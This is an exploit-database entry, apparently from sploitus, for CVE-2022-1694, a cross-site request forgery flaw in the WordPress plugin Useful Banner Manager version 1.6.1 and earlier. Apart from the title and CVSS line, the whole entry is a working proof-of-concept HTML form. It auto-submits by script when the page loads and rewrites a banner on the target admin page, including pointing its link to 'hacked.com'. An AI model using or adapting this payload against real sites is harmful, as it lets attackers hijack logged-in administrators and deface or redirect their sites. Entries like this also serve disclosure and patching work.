Exploit for Useful Banner Manager <= 1.6.1 - Modify banners via CSRF CVE-2022-1694

Name: Exploit for Useful Banner Manager <= 1.6.1 - Modify banners via CSRF CVE-2022-1694
Rating: 5 (60 reviews)

2022-05-17 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:169A6C81-6C76-4F29-8F60-B2551042B962
<form id="test" action="https://example.com/wp-admin/admin.php?page=useful-banner-manager%2Fbanners.php&ubm_banner_id=1" method="POST" enctype="multipart/form-data">
    <input type="text" name="ubm_banner_name" value="giphy">
    <input type="text" name="ubm_banner_type" value="gif">
    <input type="file" name="ubm_banner_file" value="">
    <input type="text" name="ubm_banner_title" value="test">
    <input type="text" name="ubm_banner_alt" value="test">
    <input type="text" name="ubm_banner_link" value="https://hacked.com">
    <input type="text" name="ubm_link_target" value="_self">
    <input type="text" name="ubm_link_rel" value="dofollow">
    <input type="text" name="ubm_banner_width" value="">
    <input type="text" name="ubm_banner_height" value="">
    <input type="text" name="ubm_active_until" value="">
    <input type="text" name="ubm_banner_order" value="0">
    <input type="text" name="ubm_wrapper_id" value="">
    <input type="text" name="ubm_wrapper_class" value="">
    <input type="text" name="ubm_is_visible" value="yes">
    <input type="text" name="ubm_save_banner" value="Save">
</form>
<script>
    document.getElementById("test").submit();
</script>